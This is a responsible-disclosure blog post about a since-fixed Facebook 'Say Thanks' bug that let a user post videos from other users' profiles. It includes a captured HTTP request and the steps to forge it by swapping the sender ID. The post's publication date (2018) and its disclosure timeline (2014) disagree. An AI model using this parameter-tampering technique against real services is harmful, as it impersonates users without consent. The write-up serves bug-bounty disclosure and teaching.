Vulnerability Management

Hacking Facebook.com/thanks Posting on behalf of any Facebook profile!

This is a post about how I could hack Facebook “Say Thanks” to post on behalf of any Facebook profile.

Anand Prakash

Written by Anand Prakash

February 8, 2018 | 2 min read

[Responsible disclosure]

Note: This is being published with the permission of Facebook under the responsible disclosure policy. The vulnerability is now fixed.

About Facebook “Say Thanks”

Facebook recently introduced “Say Thanks”, an experience that lets Facebook users create a personalized video card for their Facebook friends.

To create a Thanks video, a user needs to visit facebook.com/thanks and needs to choose a friend. A user could select different themes and edit photos and Facebook posts that represent their friendship.

Once the user has done the needful, they had to click on the “Share” button, and their video would be shared on their timeline with the friend tagged. It will show up on their and the friend’s timelines.

About the Vulnerability

I started digging up as soon as “Say Thanks” was launched.

Below are a few things that I have tried :

1) Posting on behalf of a non-Facebook friend.

2) Posting on behalf of a Facebook friend.

Interestingly, posting on behalf of Facebook friends worked.

After the successful exploitation, a video was posted from the victim’s profile saying thanks.

Steps to Reproduce:

1) Go to https://www.facebook.com/thanks

2) Choose any friend from your list. Now click on the “Share video” option in the top-up corner.

3) Now, before posting, make sure Burp Suite’s Interceptor is turned on to capture the request.

Click on “Post Video” now, and you will see below the kind of request in the Burp suite:

POST /thanks/send/async/ HTTP/1.1
Host:
www.facebook.com
fb_dtsg=YYYYYY&message_text=Hey Anand, I made you a video to say thanks for being such a good friend. You can make your own at facebook.com/thanks #saythanks&message=Hey @[1234543:Anand], I made you a video to say thanks for being such a good friend. You can make your own at facebook.com/thanks #saythanks&cache_version=24&content=[]&content_count=0&receiver={“id”:1234543,”fbid”:1234543,”name”:”Anand Prakash”,”imageURL”:””,”gender”:2,”greeting”:”Hey Anand”,”shortName”:”Anand”,”relationship”:-1,”relationshipName”:null,”firstName”:”Anand”,”genderType”:”MALE”,”profilePhoto”:””,”profilePhotoID”:8359028035,”profilePhotoBegin”:”}&
sender={“id”:131232524,”name”:”Sunil Bhati”,”firstName”:”Sunil”,”genderType”:”MALE”,”profilePhoto”:””,”profilePhotoID”:,”profilePhotoBegin”:””,”profilePhotoBeginID”:328985902339}&timestamp=1417279810172&theme_details={}&theme_id=DEFAULT_THEME&privacyx=9238943&__user=1234543__a=1&__dyn=&__req=13&ttstamp=__rev=1512134

4) I changed the sender={id=XXXXX} to the victim’s Facebook ID, and the video got posted from the victim’s Facebook profile in a few seconds.

Disclosure Timeline

Nov 14, 2014, 12:41 am — Report Sent to Facebook Security team

Nov 14, 2014, 2:00 am — Initial Reply from Mordecai saying he is not able to reproduce the issue

Nov 14, 2014, 8:17 am — Confirmation of vulnerability from Neal Poole

Nov 14, 2014, 10:42 am — Issued fixed by Facebook

Nov 14, 2014, 11:44 am — Fix verification by me

Nov 19, 2014, 10:10 am — Bounty of $12,500 awarded by Facebook.

Thanks to the Facebook security team for quickly fixing the issue.